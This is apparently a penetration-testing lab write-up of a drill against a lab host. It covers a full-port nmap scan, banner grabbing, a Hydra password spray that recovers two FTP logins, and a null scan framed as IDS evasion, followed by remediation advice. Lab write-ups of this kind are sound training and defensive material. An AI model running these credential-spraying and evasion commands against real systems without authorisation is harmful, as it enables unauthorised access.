Full-port nmap, FTP spray, and null-scan evasion
Intermediate network assessment drill: full TCP inventory, banner harvesting, Hydra against vsftpd on a non-standard port, and null-scan IDS evasion — methodology without a full boot-to-root.
- Case files
- Full-port nmap, FTP spray, and null-scan evasion
A methodology lab focused on accurate port discovery, service banners, credential spraying on FTP, and stealth scan types — not privilege escalation.
nmap -sV -p- -A enumerated SSH, lighttpd, Samba, Express on 8080, and vsftpd on 10021.
Hydra against vsftpd:10021 recovered eddie:jordan and quinn:andrea. Quinn’s session held an operational artifact.
A TCP null scan (-sN) exercised IDS evasion technique against the same host inventory.
Engagement summary
A methodology lab focused on accurate port discovery, service banners, credential spraying on FTP, and stealth scan types — not privilege escalation.
Against 10.201.27.157 we ran a full TCP version scan, recovered SSH and HTTP banner artifacts, identified six open ports including vsftpd on 10021 and a Node service on 8080, sprayed FTP for eddie and quinn, and demonstrated a null scan for IDS evasion. This case documents operator technique for network security assessments where the deliverable is coverage and credential risk, not root.
Business impact
Non-standard FTP ports and weak passwords still yield data exposure. Banner leakage and incomplete port coverage leave blind spots in both offense and defense. Require full-port inventories in scopes, rotate FTP credentials, and alert on null/FIN/Xmas scans.
Full-port service discovery
nmap -sV -p- -A enumerated SSH, lighttpd, Samba, Express on 8080, and vsftpd on 10021.
OPERATOR · NMAP
savvy@lab:~$ nmap -sV -p- -A 10.201.27.157
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu
80/tcp open http lighttpd
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
8080/tcp open http Node.js Express framework
10021/tcp open ftp vsftpd 3.0.5
OPERATOR · BANNERS
savvy@lab:~$ nc 10.201.27.157 22
SSH-2.0-OpenSSH_8.2p1 Ubuntu ...
savvy@lab:~$ curl -I http://10.201.27.157
Server: lighttpd
FTP credential spray
Hydra against vsftpd:10021 recovered eddie:jordan and quinn:andrea. Quinn’s session held an operational artifact.
OPERATOR · HYDRA
savvy@lab:~$ hydra -L user.txt -P /usr/share/wordlists/rockyou.txt ftp://10.201.27.157:10021
[10021][ftp] host: 10.201.27.157 login: eddie password: jordan
[10021][ftp] host: 10.201.27.157 login: quinn password: andrea
savvy@lab:~$ ftp 10.201.27.157 10021
Name: quinn
ftp> get ftp_flag.txt
ftp> bye
Null-scan evasion check
A TCP null scan (-sN) exercised IDS evasion technique against the same host inventory.
OPERATOR · NULL SCAN
savvy@lab:~$ nmap -sN 10.201.27.157
# null scan: no TCP flags set — useful for firewall/IDS behavior checks
Nmap done: 1 IP address (1 host up) scanned
Remediation
Enforce strong FTP passwords and MFA where possible; close unused high ports; strip sensitive data from banners; tune IDS for unusual TCP flag combinations including null, FIN, and Xmas scans.